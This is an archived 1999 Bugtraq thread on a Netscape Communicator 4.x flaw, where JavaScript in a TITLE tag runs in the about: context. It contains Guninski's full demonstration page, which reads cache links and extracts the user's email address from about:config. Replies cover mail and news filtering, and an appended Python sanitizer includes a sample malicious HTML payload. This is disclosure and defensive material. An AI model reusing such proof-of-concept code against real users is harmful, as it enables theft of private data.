netscape.title.tag.about.txt

1999-08-17T00:00:00
ID PACKETSTORM:11936
Type packetstorm
Reporter Georgi Guninski
Modified 1999-08-17T00:00:00

Description

                                        
Date: Mon, 24 May 1999 14:24:13 +0300  
From: Georgi Guninski <joro@NAT.BG>  
To: BUGTRAQ@netspace.org  
Subject: Netscape Communicator JavaScript in <TITLE> security vulnerability  
  
There is a security bug in Netscape Communicator 4.6 Win95, 4.07 Linux  
(guess all 4.x versions are affected) in the way they treat JavaScript  
code in the title of the document.  
  
One may embed JavaScript code in the <TITLE> tag. If the info about the  
document is shown, then the JavaScript code is executed. The info about the  
document may be invoked by a script using 'location="wysiwyg://1/about:document" '.  
  
The problem is that the JavaScript code is executed in the security context  
of the "about:" protocol. This allows accessing documents in the "about:"  
protocol such as: "about:cache", "about:config", "about:global", etc.  
  
Vulnerabilities:  
* Reading user's cache and accessing information such as passwords,  
credit card numbers.  
* Reading info about the Netscape's configuration ("about:config").  
This includes finding user's email address, mail servers, the encoded mail password  
(it must be saved and may be decoded). This allows reading user's email.  
  
The more dangerous part is that this vulnerability MAY BE EXPLOITED  
USING HTML MAIL MESSAGE.  
  
  
Workaround: Disable JavaScript  
  
Demonstration is available at: http://www.nat.bg/~joro/titlecache.html  
  
Georgi Guninski  
http://www.nat.bg/~joro  
http://www.whitehats.com/guninski  
  
----------------------------------------------------------------------------------------  
  
<http://www.nat.bg/~joro/titlecache.html>  
  
<HTML>  
<HEAD>  
<TITLE>  
<SCRIPT>  
  
a=window.open('wysiwyg://1/about:cache');  
s='Here are some links in your cache: \n';  
for(i=0;i<7;i++)  
s += a.document.links[i] + '\n';   
a.close();  
alert(s);  
  
  
a=window.open('wysiwyg://1/about:config');  
  
mag='mail.identity.useremail = ';  
mend='general.title_tips';  
res=mag;  
charstoread=20;  
  
alert('Will try to find your email. May take some time.');  
  
function readit() {  
for(i=0;i<charstoread;i++) {  
t=res;  
a.find(mend);  
for(c=1;c<256;c++) {  
t=res + String.fromCharCode(c);  
  
if (a.find(t,true,true)) {  
/* alert(c); */  
res=t;  
}   
}  
}  
res=res.substring(mag.length);  
a.close();  
alert("Your email is :\n" + res);  
}  
  
setTimeout("readit()",3000);  
</SCRIPT>  
</TITLE>  
</HEAD>  
  
<body>  
  
There is a security bug in Netscape Communicator 4.6 Win95, 4.07 Linux  
(guess all 4.x versions are affected) in the way they treat JavaScript  
code in the title of the document.  
<p>One may embed JavaScript code in the TITLE tag. If the info about  
the document  
<br>is shown, then the JavaScript code is executed. The info about the  
document may be invoked by a script using 'location="wysiwyg://1/about:document"  
'.  
<p>The problem is that the JavaScript code is executed in the security  
context of the "about:" protocol. This allows accessing documents in the  
"about:" protocol such as: "about:cache", "about:config", "about:global",  
etc.  
<p>Vulnerabilities:  
<br> * Reading user's cache and accessing information such as passwords,  
credit card numbers.  
<br> * Reading info about the Netscape's configuration ("about:config").  
This includes  finding user's email address, mail servers, the encoded  
mail password (it must be saved and may be decoded). This allows  
reading user's email.  
<br>  
The more dangerous part is that this vulnerability MAY BE EXPLOITED USING HTML MAIL MESSAGE.  
<br>  
  
  
<p>Workaround: Disable JavaScript  
<br>  
<a href="index.html">Go to Georgi Guninski's home page</a>  
<br>  
<br>  
  
<SCRIPT>  
location="wysiwyg://1/about:document";  
</SCRIPT>  
  
  
</body>  
</HTML>  
  
----------------------------------------------------------------------------------------  
  
Date: Mon, 24 May 1999 10:23:06 -0700  
From: John D. Hardin <jhardin@WOLFENET.COM>  
To: BUGTRAQ@netspace.org  
Subject: Re: Netscape Communicator JavaScript in <TITLE> security vulnerability  
  
On Mon, 24 May 1999, Georgi Guninski wrote:  
  
> Vulnerabilities:  
> * Reading user's cache and accessing information such as passwords,  
> credit card numbers.  
> * Reading info about the Netscape's configuration ("about:config").  
> This includes finding user's email address, mail servers, the  
> encoded mail password (it must be saved and may be decoded). This  
> allows reading user's email.  
>  
> The more dangerous part is that this vulnerability MAY BE EXPLOITED  
> USING HTML MAIL MESSAGE.  
  
...unless you're sanitizing your email. Anybody using an HTML-enabled  
mail client should at least be aware of the availability of this tool:  
  
ftp://ftp.rubyriver.com/pub/jhardin/antispam/procmail-security.html  
  
--  
John Hardin KA7OHZ jhardin@wolfenet.com  
pgpk -a finger://gonzo.wolfenet.com/jhardin PGP key ID: 0x41EA94F5  
PGP key fingerprint: A3 0C 5B C2 EF 0D 2C E5 E9 BF C8 33 A7 A9 CE 76  
-----------------------------------------------------------------------  
In the Lion  
the Mighty Lion  
the Zebra sleeps tonight...  
Dee de-ee-ee-ee-ee de de de we um umma way!  
-----------------------------------------------------------------------  
9 days until Crusade: the Babylon Project  
  
----------------------------------------------------------------------------------------  
  
Date: Tue, 25 May 1999 12:30:52 -0600  
From: Brett Glass <brett@LARIAT.ORG>  
To: BUGTRAQ@netspace.org  
Subject: Re: Netscape Communicator JavaScript in <TITLE> security vulnerability  
  
John's recipes are great tools; we recommend them. Only one problem:  
Procmail does not work on NetNews. (If this exploit works in mail it  
almost certainly works in news.... Scary thought.)  
  
--Brett Glass  
  
At 10:23 AM 5/24/99 -0700, John D. Hardin wrote:  
>On Mon, 24 May 1999, Georgi Guninski wrote:  
>  
> > Vulnerabilities:  
> > * Reading user's cache and accessing information such as passwords,  
> > credit card numbers.  
> > * Reading info about the Netscape's configuration ("about:config").  
> > This includes finding user's email address, mail servers, the  
> > encoded mail password (it must be saved and may be decoded). This  
> > allows reading user's email.  
> >  
> > The more dangerous part is that this vulnerability MAY BE EXPLOITED  
> > USING HTML MAIL MESSAGE.  
>  
>...unless you're sanitizing your email. Anybody using an HTML-enabled  
>mail client should at least be aware of the availability of this tool:  
>  
> ftp://ftp.rubyriver.com/pub/jhardin/antispam/procmail-security.html  
>  
>--  
> John Hardin KA7OHZ jhardin@wolfenet.com  
> pgpk -a finger://gonzo.wolfenet.com/jhardin PGP key ID: 0x41EA94F5  
> PGP key fingerprint: A3 0C 5B C2 EF 0D 2C E5 E9 BF C8 33 A7 A9 CE 76  
>-----------------------------------------------------------------------  
> In the Lion  
> the Mighty Lion  
> the Zebra sleeps tonight...  
> Dee de-ee-ee-ee-ee de de de we um umma way!  
>-----------------------------------------------------------------------  
> 9 days until Crusade: the Babylon Project  
  
----------------------------------------------------------------------------------------  
  
Date: Tue, 25 May 1999 21:40:43 -0400  
From: Forrest J. Cavalier III <mibsoft@mibsoftware.com>  
To: BUGTRAQ@netspace.org  
Subject: Re: Netscape Communicator JavaScript in <TITLE> security  
  
> John's recipes are great tools; we recommend them. Only one problem:  
> Procmail does not work on NetNews. (If this exploit works in mail it  
> almost certainly works in news.... Scary thought.)  
>  
> --Brett Glass  
>  
  
I don't know if the exploit works with Usenet messages, but  
decent Usenet servers have filtering capabilities.  
  
INN had perl filtering hooks since at least 1995,  
and had easily modified code to analyze and reject  
messages based on headers since the beginning (1993).  
  
In Usenet, generally most sites do not modify  
and sanitize messages, they just drop and reject them  
with just a message to the log, nothing else. Since  
propagating modified messages, for whatever reason, is  
never acceptable, it becomes a problem to sanitize:  
it would mean keeping additional special copies around.  
  
A full Usenet feed is on the order of 1E6 messages  
per day, and nearly all are binaries (UUEncoded). The John D.  
Hardin code looks solid, but might bog down a server  
if every Usenet message had to go through it.  
  
Personally, I don't think HTML (or binaries) belong  
on Usenet in the first place, so it's a simple policy  
to just drop posts containing HTML or UUencoding. :-)  
  
Seriously, the Hardin perl code will drop pretty easily  
into INN, although I haven't tried it myself.  
See README.perl_hook in the INN distribution and  
modify the procmail selector lines to the appropriate  
perl instead, and return a reject code instead of  
mangling and rewriting.  
  
Forrest J. Cavalier III, Mib Software, INN customization and  
consulting 'Pay-as-you-go' commercial support for INN: Only $64/hour!  
Searchable hypertext INN docs, FAQ, RFCs, etc: 650+ pages:  
http://www.mibsoftware.com/innsup.htm  
  
----------------------------------------------------------------------------------------  
  
Date: Tue, 25 May 1999 22:32:25 -0400  
From: Usman <akeju00@IONAPREP.ORG>  
To: BUGTRAQ@netspace.org  
Subject: Re: Netscape Communicator JavaScript in <TITLE> security vulnerability  
  
"John D. Hardin" wrote:  
>  
> On Mon, 24 May 1999, Georgi Guninski wrote:  
>>snip!<<  
> > The more dangerous part is that this vulnerability MAY BE EXPLOITED  
> > USING HTML MAIL MESSAGE.  
>  
> ...unless you're sanitizing your email. Anybody using an HTML-enabled  
> mail client should at least be aware of the availability of this tool:  
>  
> ftp://ftp.rubyriver.com/pub/jhardin/antispam/procmail-security.html  
>  
> --  
> John Hardin KA7OHZ jhardin@wolfenet.com  
  
  
Or, just to add the said workaround, if you're only worried about email,  
Netscape 4.5+ users can just disable JavaScript for Mail and News without  
disabling JavaScript altogether. I know there's still the meta refresh factor  
for HTML-enabled mail clients, though. It would be, IMHO, a good idea for  
Netscape to add a little "Disable/Enable HTML for Mail Messages" checkbox, don't  
you think?  
  
-Usman Akeju  
  
----------------------------------------------------------------------------------------  
  
Date: Sat, 12 Jun 1999 22:58:26 -0700  
From: John D. Hardin <jhardin@WOLFENET.COM>  
To: BUGTRAQ@netspace.org  
Subject: Re: Netscape Communicator JavaScript in <TITLE> security  
  
On Thu, 27 May 1999, Aleph One wrote:  
  
> That doesn't really cut it. You can embed JavaScript into things  
> like onClick, onLoad, etc. You need to kill all those as well.  
  
Thanks for pointing that out. I've updated the sanitizer to defang the  
event handlers explicitly, which saves blocking the <BODY> and <TITLE>  
tags themselves, and also protects links.  
  
The current release of the sanitizer is 1.84 and it is available at  
ftp://ftp.rubyriver.com/pub/jhardin/antispam/procmail-security.html  
  
--  
John Hardin KA7OHZ jhardin@wolfenet.com  
pgpk -a finger://gonzo.wolfenet.com/jhardin PGP key ID: 0x41EA94F5  
PGP key fingerprint: A3 0C 5B C2 EF 0D 2C E5 E9 BF C8 33 A7 A9 CE 76  
-----------------------------------------------------------------------  
Efficiency can magnify good, but it magnifies evil just as well.  
So, we should not be surprised to find that modern electronic  
communication magnifies stupidity as *efficiently* as it magnifies  
intelligence.  
-- Robert A. Matern  
-----------------------------------------------------------------------  
89 days until 9/9/99  
  
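The defensive advice in the thread converges on one control from several directions: sanitize HTML before a JavaScript-capable mail or news client renders it, strip script blocks wherever they sit (the <TITLE> tag included), defang the on* event handlers Aleph One flagged, protect links, and, per Usman's note, deal with meta refresh as well. As an added example for this archive page, not Hardin's procmail sanitizer and not Netscape code, here is a small Python sanitizer that does those things and records what it found, so a filter can either rewrite the message or, as Cavalier suggests for news, reject it outright. The scheme list, the URL attribute list, the "defang-" attribute prefix and the sample message are assumptions of this example.

```python
"""Defensive HTML-mail sanitizer (added example for this archive page; not the
procmail sanitizer discussed in the thread and not Netscape code).
Removes <script> blocks wherever they appear, <title> included, renames on*
event handlers, defangs script/browser-internal URL schemes, drops meta
refresh, and records every change so a mail filter can log or reject."""
import html
import re
from html.parser import HTMLParser

# Assumed policy lists: schemes that never belong in a mail link, and the
# attributes that carry URLs in the HTML a late-1990s client renders.
DANGEROUS_SCHEMES = {"javascript", "vbscript", "wysiwyg", "about"}
URL_ATTRS = {"href", "src", "action", "background", "lowsrc"}


def url_scheme(value):
    """Lower-cased scheme of an attribute value, or None. Whitespace and control
    characters are removed first so ' JavaScript:' or 'java\\nscript:' are caught."""
    cleaned = re.sub(r"[\s\x00-\x1f]", "", value or "")
    m = re.match(r"([a-z][a-z0-9+.\-]*):", cleaned, re.IGNORECASE)
    return m.group(1).lower() if m else None


class MailSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=False)  # re-emit entities untouched
        self.out, self.findings = [], []
        self._in_script = self._in_title = False

    @staticmethod
    def _is_refresh(attrs):
        return any(n == "http-equiv" and (v or "").strip().lower() == "refresh"
                   for n, v in attrs)

    def _open_tag(self, tag, attrs, selfclosing):
        if tag == "script":                      # tag and body both disappear
            self._in_script = not selfclosing
            self.findings.append("<script> block removed")
            return
        if tag == "meta" and self._is_refresh(attrs):
            self.findings.append("<meta http-equiv=refresh> removed")
            return
        if tag == "title":
            self._in_title = True
        parts = [tag]
        for name, value in attrs:                # HTMLParser lower-cases names
            scheme = url_scheme(value) if name in URL_ATTRS else None
            if name.startswith("on"):
                # onClick/onLoad etc. run script with no <script> tag at all.
                self.findings.append(f"event handler {name} on <{tag}>")
                name = "defang-" + name          # assumed convention: unknown attr
            elif scheme in DANGEROUS_SCHEMES:
                self.findings.append(f"{scheme}: URL in {name} on <{tag}>")
                value = "#defanged"
            parts.append(name if value is None
                         else f'{name}="{html.escape(value, quote=True)}"')
        self.out.append("<" + " ".join(parts) + (" /" if selfclosing else "") + ">")

    def handle_starttag(self, tag, attrs):
        self._open_tag(tag, attrs, False)

    def handle_startendtag(self, tag, attrs):
        self._open_tag(tag, attrs, True)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
            return
        if tag == "title":
            self._in_title = False
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if self._in_script:
            return
        if self._in_title:
            # Some html.parser versions treat <title> content as text and hand a
            # <SCRIPT> inside it to handle_data; escaping the text means no client,
            # Netscape 4 included, can ever reparse it as markup.
            if re.search(r"<\s*/?\s*script", data, re.IGNORECASE):
                self.findings.append("script markup inside <title> neutralized")
            data = html.escape(data)
        self.out.append(data)

    def handle_entityref(self, name):
        self.out.append(f"&{name};")

    def handle_charref(self, name):
        self.out.append(f"&#{name};")

    def handle_comment(self, data):
        self.out.append(f"<!--{data}-->")

    def handle_decl(self, decl):
        self.out.append(f"<!{decl}>")


def sanitize(html_text):
    """Return (sanitized_html, findings) for one HTML message body."""
    parser = MailSanitizer()
    parser.feed(html_text)
    parser.close()
    return "".join(parser.out), parser.findings


# Constructed sample shaped like the demonstration page quoted in the thread:
# script inside <title>, a navigation script, plus an event handler, a
# disguised javascript: link and a meta refresh that a <script>-only filter misses.
SAMPLE = """<HTML><HEAD>
<TITLE><SCRIPT>a=window.open('wysiwyg://1/about:cache');</SCRIPT></TITLE>
<META HTTP-EQUIV="refresh" CONTENT="0;url=http://example.invalid/">
</HEAD><BODY onLoad="alert(1)">
<a href=" JavaScript:alert(1)">click</a>
<a href="http://example.invalid/ok">ok</a> &amp; more
<SCRIPT>location="wysiwyg://1/about:document";</SCRIPT>
</BODY></HTML>"""

if __name__ == "__main__":
    clean, found = sanitize(SAMPLE)
    print(clean)
    for f in found:
        print("finding:", f)
```

Run it directly to see the cleaned sample and the findings; in a filter, call sanitize() on the HTML body and treat a non-empty findings list as the signal to quarantine or reject rather than forward a rewritten copy, which is the policy Cavalier describes for news servers. Title text is re-emitted HTML-escaped so the result is safe whether the parser saw the embedded <SCRIPT> as a tag (and removed it) or as text.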